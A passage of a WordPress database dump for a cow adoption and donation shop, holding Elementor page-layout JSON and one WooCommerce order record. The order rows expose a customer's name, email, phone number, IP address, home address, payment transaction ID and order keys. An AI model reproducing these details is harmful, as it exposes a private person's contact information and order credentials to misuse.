mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by\\u00a0<a href=\\\"https:\\/\\/themehunk.com\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Themehunk<\\/a><\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#020202\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12359,2025,'_elementor_page_assets','a:0:{}'),(12366,2031,'_elementor_edit_mode','builder'),(12367,2031,'_elementor_template_type','wp-page'),(12368,2031,'_elementor_version','3.8.0'),(12369,2031,'_wp_page_template','elementor_canvas'),(12370,2031,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12371,2031,'_elementor_page_assets','a:0:{}'),(12379,2032,'_order_key','wc_order_5s9rPi7ngxJrf'),(12380,2032,'_customer_user','0'),(12381,2032,'_payment_method','razorpay'),(12382,2032,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(12383,2032,'_customer_ip_address','157.45.161.41'),(12384,2032,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'),(12385,2032,'_created_via','checkout'),(12386,2032,'_cart_hash','e4283abb8e2314d75457e0b5ab17ad62'),(12387,2032,'_download_permissions_granted','yes'),(12388,2032,'_recorded_sales','yes'),(12389,2032,'_recorded_coupon_usage_counts','yes'),(12390,2032,'_new_order_email_sent','true'),(12391,2032,'_order_stock_reduced','yes'),(12392,2032,'_billing_first_name','pavithra'),(12393,2032,'_billing_last_name','g'),(12394,2032,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(12395,2032,'_billing_address_2','near golden fresh super market'),(12396,2032,'_billing_city','bangalore'),(12397,2032,'_billing_state','KA'),(12398,2032,'_billing_postcode','560102'),(12399,2032,'_billing_country','IN'),(12400,2032,'_billing_email','pggg1507@gmail.com'),(12401,2032,'_billing_phone','07411722844'),(12402,2032,'_shipping_first_name','pavithra'),(12403,2032,'_shipping_last_name','g'),(12404,2032,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(12405,2032,'_shipping_address_2','near golden fresh super market'),(12406,2032,'_shipping_city','bangalore'),(12407,2032,'_shipping_state','KA'),(12408,2032,'_shipping_postcode','560102'),(12409,2032,'_shipping_country','IN'),(12410,2032,'_order_currency','INR'),(12411,2032,'_cart_discount','0'),(12412,2032,'_cart_discount_tax','0'),(12413,2032,'_order_shipping','0'),(12414,2032,'_order_shipping_tax','0'),(12415,2032,'_order_tax','0'),(12416,2032,'_order_total','21000.00'),(12417,2032,'_order_version','7.1.0'),(12418,2032,'_prices_include_tax','no'),(12419,2032,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN pggg1507@gmail.com 07411722844'),(12420,2032,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(12421,2032,'is_vat_exempt','no'),(12422,2032,'_wc_cancel_key','75e2408ef615764fb2f35a355c10bcd5'),(12423,2032,'_wcfmmp_order_processed','yes'),(12424,2032,'is_magic_checkout_order','no'),(12425,2032,'_transaction_id','pay_KizcRN96n0nX9j'),(12426,2032,'_date_paid','1669100111'),(12427,2032,'_paid_date','2022-11-22 12:25:11'),(12428,2032,'_wcfm_new_order_notified','yes'),(12429,2032,'_wcfm_membership_order_processed','yes'),(12430,2032,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(12431,2032,'_wcpdf_invoice_date','1669100111'),(12432,2032,'_wcpdf_invoice_date_formatted','2022-11-22 12:25:11'),(12433,2032,'_wcpdf_invoice_number','14'),(12434,2032,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:14;s:16:\"formatted_number\";s:2:\"14\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:2032;s:7:\"padding\";N;}'),(12435,2032,'_wcfmmp_order_email_triggered','yes'),(12436,584,'_elementor_css','a:6:{s:4:\"time\";i:1670394368;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:1;s:11:\"Roboto 